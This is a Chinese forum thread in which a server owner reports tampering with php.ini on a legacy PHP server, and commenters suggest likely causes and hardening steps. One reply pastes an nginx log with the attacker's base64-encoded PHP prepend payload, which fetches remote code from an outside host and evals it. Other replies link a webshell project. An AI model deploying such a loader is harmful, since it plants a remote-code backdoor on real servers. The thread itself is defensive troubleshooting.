这是一个创建于 617 天前的主题,其中的信息可能已经有所发展或是发生改变。
用来跑老项目的服务器的 php.ini 里面的 auto_prepend_file 和 allow_url_include 被修改了,导致请求返回的内容出现了问题,有没有大佬说下这是怎么修改的
 | 1 luoyide2010 2024-04-11 10:21:35 +08:00  2 大概是有漏洞被拿到权限呗,除非你能提供源码或者远控环境,单凭几个字描述怎么可能定位到问题? |
 | 2 xuanbg 2024-04-11 10:26:51 +08:00 7 我不是什么安全大佬,我只会一招,就是开白名单。除了 80 和 443 ,其他端口只能我自己的 ip 可以访问。从 2000 年至今 24 年了,服务器都换过好几茬了,从来没有被攻破过。 |
 | 3 tunggt 2024-04-11 10:53:41 +08:00 你这只能一点一点排查,就你说的只有这点内容,谁都没法给你解决办法 |
 | 4 kokutou 2024-04-11 10:54:21 +08:00 via Android 把软件都升到最新吧。。。 |
 | 5 Seanfuck 2024-04-11 10:57:25 +08:00 SSH 被爆破了?看下日志 |
 | 6 pota 2024-04-11 11:05:53 +08:00 你这相当于啥都没说啊。。 |
 | 7 dhb233 2024-04-11 11:07:33 +08:00 把你的 IP 、域名放出来,看看有没有大佬给你再攻破了 |
 | 8 344457769 2024-04-11 11:07:58 +08:00 PHP 很多漏洞可以 getshell ,排查一下 PHP 系统框架版本,找找业务方面的漏洞,重点关注一下上传图片上传文件的逻辑有没有做文件类型判断,把危险的请求体给过滤下,系统数据做好备份后更新下软件吧。 |
 | 9 miyuki 2024-04-11 11:10:04 +08:00 1. php 网站程序漏洞被 getshell 了(被植入恶意指令) 2. ssh 弱密码被破解了 3. 其它程序比如 redis 没做好安全防护 很多很多可能 |
 | 10 Greenm 2024-04-11 11:17:59 +08:00 描述这么少,问得这么简单,可能同样的字数仅有给 ssh 权限才能帮你排查出来了。 |
 | 11 opengps 2024-04-11 11:18:04 +08:00 @xuanbg 你这样还不够,系统自身漏洞没堵上,我遇到过有人利用我的上传没处理权限漏洞传进来一份木马脚本,还挺好用,可以直接执行 sql 语句 |
 | 13 itechify PRO @xiao17 满猜 openGPS.cn |
 | 15 I2E 2024-04-11 11:49:55 +08:00 https://github.com/rebeyond/Behinder 之前被这个木马搞过 |
 | 20 block0 2024-04-11 12:42:31 +08:00 via Android 1 你用宝塔了? |
| 21 opengps 2024-04-11 12:45:12 +08:00 @oneisall8955 还是你狠,至今日志天天都有一堆扫描器的痕迹 |
 | 22 l2d 2024-04-11 12:46:22 +08:00 via Android 任意文件写 or rce 具体什么问题查流量日志的异常流量 |
 | 23 dzdh 2024-04-11 12:51:48 +08:00 selinux 一开。完事。 不要闲着没事蛋疼自己编译 php 。就用系统自带的。 debian 系的用 https://packages.sury.org/php/ rh 系的用 https://rpms.remirepo.net/ 开启 selinux / apparmor 就不可能修改到你的配置文件 |
 | 24 Remember 2024-04-11 12:53:23 +08:00 网站写的烂,被拿到 webshell 了。 |
 | 25 idc181906 2024-04-11 13:17:05 +08:00 via iPhone 1 你不关闭 22 端口的吗,最近挺多漏扫的,还是关闭了吧。 |
 | 26 han1988 2024-04-11 13:23:24 +08:00 套 WAF 呀 |
 | 27 vcn8yjOogEL 2024-04-11 14:18:51 +08:00 网页服务器套 SELinux, 嫌麻烦就上 Debian 用 AppArmor, 不过效果会差一点 防火墙只开 80, 443 和一个随机的 ssh 端口 ssh 白名单, 要是白名单的网段大就再上 fail2ban |
 | 28 hefish 2024-04-11 14:25:12 +08:00 4 OP: 我有病,医生你快给我开药吧。。。 医生: 要不说说哪儿不舒服? OP:我就是病了,你不是医生吗?快点开药啊。。。 医生:。。。。 |
 | 29 weijancc 2024-04-11 15:01:49 +08:00 1 就简单一句, 改为使用 ssh 密钥登录服务器, 禁用密码, 我的服务器都直接开放 22 端口的. |
 | 30 catamaran 2024-04-11 15:45:43 +08:00 网上找破解的 awvs ,自己扫描一下 |
 | 31 way2create 2024-04-11 16:52:17 +08:00 1 信息太少了,不过既然是 PHP 老项目,有一个可能是漏扫然后 getshell 了,之前服务器领导就部署了这种 shi 山老项目中招了,还好对方也没整什么大动作。。。emm 领导要这样搞我也管不着,只不过擦屁股有点烦 |
 | 32 justfindu 2024-04-11 16:53:45 +08:00 啥信息都没有, log 也没有, 还想看看咋样的, 好自我加强一下 |
 | 33 luozic 2024-04-11 17:21:55 +08:00 1 安全问题,扫机器,看能不能处理,不能处理那就换个机器,把数据备份杀毒,再传新服务器-----这次在新机器上注意安全加固和扫一下自己的代码 部署的各个东西的版本有啥漏洞没 |
 | 34 ydpro OP 上午太忙了,下面是 nginx 的部分报错信息 2024/04/03 14:24:55 [error] 85023#0: *418871825 FastCGI sent in stderr: "PHP message: PHP Warning: file_get_contents( http://8.jsc20242.com:81/jsc/jsc.txt): failed to open stream: Connection timed out in data:;base64,PD9waHAgaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCAib2ZmIik7ZXZhbCgnPz4nLmZpbGVfZ2V0X2NvbnRlbnRzKGJhc2U2NF9kZWNvZGUoJ2FIUjBjRG92THpndWFuTmpNakF5TkRJdVkyOXRPamd4TDJwell5OXFjMk11ZEhoMCcpKSk7Pz4= 不知道攻击者怎么修改 php.ini 的 auto_prepend_file 和 allow_url_include |
 | 35 sofukwird 2024-04-11 18:00:29 +08:00 via Android 1 搜一搜 PHP 高危漏洞,然后对比下你所使用的 PHP 版本,如果 PHP 版本比较老的话就会中招 |
 | 36 Metre 2024-04-11 19:50:46 +08:00 网址告诉我,我帮你做个漏扫评估 |
 | 37 GUSNYpU376k4Sx2V 2024-04-12 01:14:22 +08:00 1 @opengps #21 502 了 |
 | 38 coderzhangsan 2024-04-12 09:13:31 +08:00 1 大概率你用宝塔部署 php 环境了吧,如果你用宝塔装了,就又很大概率中招,建议你卸掉宝塔,重新部署环境吧,稍微学一下,部署 php 环境很简单的。 |
| 39 way2create 2024-04-12 15:58:20 +08:00 @coderzhangsan 想起之前有个新来的主管问我为啥之前 Linux 服务器都不用宝塔 说脚本装的命令行维护太麻烦 换成他全装宝塔 |
Select Language